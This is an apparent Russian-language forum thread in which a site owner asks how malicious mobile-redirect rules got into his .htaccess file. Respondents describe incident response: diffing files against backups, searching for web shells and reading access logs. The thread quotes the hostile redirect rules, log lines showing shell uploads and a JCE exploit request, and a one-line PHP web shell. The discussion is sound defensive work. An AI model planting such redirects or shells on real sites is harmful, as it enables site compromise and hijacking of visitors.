Каким образом малвари попадают на сайт?

Question

[neopug]

Добрый день,
подскажите, каким образом на сайт может попасть малварь?
Предыстория — пришло письмо от яндекса, что мой сайт, возможно, взломан. После беглого анализа нашет в .htacceess вот такую дрянь:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://id.nice-dns.ru/?18&source=oda.ua [L,R=302] # on
Авторизация у меня идет по ключам, порт ssh — не стандартный. Чужих скриптов практически нет (каюсь, есть сапа, но как я понимаю, если бы это была она, то пол рунета бы уже визжала). Где-то с пару месяцев назад была похожая ситуация, но тогда аторизация к ssh была по логину/паролю и сессия была записана в winscp. Я предположил, что у меня просто свиснули пароль и сделали зловред, но похоже ноги растут откуда-то с другого места.
Может есть какие-нибудь сканеры уязвимостей по адекватным деньгам? Или это какая-то изветсная дырка? Потому как под новый год, ведел такое же у polyana.ua/, к которым имею отношения только как клиент.

Answer 1

[sledopit]

Как правило такая фигня распространяется двумя способами:
А. дыра в сайте. ищется путём усердного чтения логов и поиска шеллов.
совсем недавно я помогал товаришу с похожей штукой (на ресурсе воткнулись iframe'ы). порядок действий был примерно такой:

1. сравнение с бэкапом и выявление изменнённых / новых файлов
2. изучение новых файлов, естественно, один из них оказался шеллом ( .cache_rcnzyz.php )
   (если нет бэкапов, то ССЗБ стоит поискать на стандартные функции шеллов (в случае с php это всякие shell_exec и base64 [стоит учитывать, что свой код так же может их использовать, поэтому искать нужно внимательно])
3. изучение логов на предмет доступа и заливки данного шелла. у меня были примерно такие строки:
   

   xxx.xxx.xxx.xx - - [09/Jan/2013:18:09:46 +0400] "POST /images/stories/.cache_rcnzyz.php HTTP/1.0" 200 501 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

   
   к сожалению злоумышленник оказался достаточно осторожным и с этого ip (который к тому же оказался и зарубежным, т.е. доблестной полиции не пожалуешься) других обращений не было. нужная дыра была найдена по времени создания файла (+- пара минут).
   

   zzz.zzz.zzz.zz - - [08/Jan/2013:00:02:21 +0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 668 "-" "BOT/0.1 (BOT for JCE)"

ура, дырка найдена, заплатка сделана, злоумышленник забанен.

В. человек с ftp доступом к ресурсу подхватил троян (про ssh слышал лишь один раз). ну тут менять пароли и фиксить заражённую машину.

Comments

[neopug]

Скажите, у вас лог с потолка или с реального случая? У меня изменения то же от 9 января. Но кроме как в htaccess их нигде больше нет. Похоже, что внедрение было во время В — отбрасывается, т.к. авторизация только по rsa ключу, к тому же забыл сказать, что сайт был в это время под cloudfare, т.е. прямого доступа к ssh вообще не было, т.е. это однозначно скрипты.

[sledopit]

лог реальный.

[neopug]

Ура, нашел!
37.230.112.58 — - [09/Jan/2013:12:20:21 +0200] «POST /dumper.php HTTP/1.1» 200 17333
37.230.112.58 — - [09/Jan/2013:12:20:22 +0200] «POST /dumper.php HTTP/1.1» 200 39113
37.230.112.58 — - [09/Jan/2013:12:20:22 +0200] «POST /dumper.php HTTP/1.1» 200 3727
37.230.112.58 — - [09/Jan/2013:12:20:22 +0200] «POST /dumper.php HTTP/1.1» 200 3713
Еще раз всем спасибо. У скрипта dumper.php был root:root и 777. Мой косяк из молодости, когда не мог корректно сделать бекап mysql с консоли :)

Answer 2

[ТыжСисАдмин]

Так вы-же не указали изначально что VDS ;)

Всё-же поищите шелы в php (или на чём у вас там) скриптах, что-то типо
<?php system($_GET["cmd"]); ?>
но скорее всего всё будет завёрнуто в base64, как правило сразу обосновываются. Проверить можно просто сравнением всех файлов с эталоном, у меня на нескольких серверах ежедневно прогоняется сравнение MD5 сумм.

Comments

[neopug]

Моя вина, что не указал. Есть svn репозиторий, сейчас попробую посравнивать. Спасибо за совет.

[ТыжСисАдмин]

Ниже sledopit всё популярно написал, с примерами даже. )

Answer 3

[ТыжСисАдмин]

Не обязательно взломали ваш аккаунт, взломан мог был и весь сервер — получили административный аккаунт.
В идеале смотреть логи сервера и искать каким образом был изменён файл.

Заодно по всем файлам поискать внедренный shell.

Comments

[neopug]

Сайт один на VDS под KVM, соседей нет. Доступ с ноды маловероятен, т.к. это сложно, а малварь идет по накатаной схеме.

[wearymax]

Как вариант — дырка в скрипте, смотрите логи

[ТыжСисАдмин]

Обосноваться могли ещё тогда, когда, была авторизация по login/pass.
А так в любом случае искать источник.

Answer 4

[pessom]

FTP поднят?

Comments

[neopug]

Нет, только ssh и 80 порт

Answer 5

[charliez]

Движок сайта не вордпресс случайно?

Comments

[neopug]

Ннет, самопис студийный, да еще и зазенден безбожно. У меня только к темплейтам доступ есть.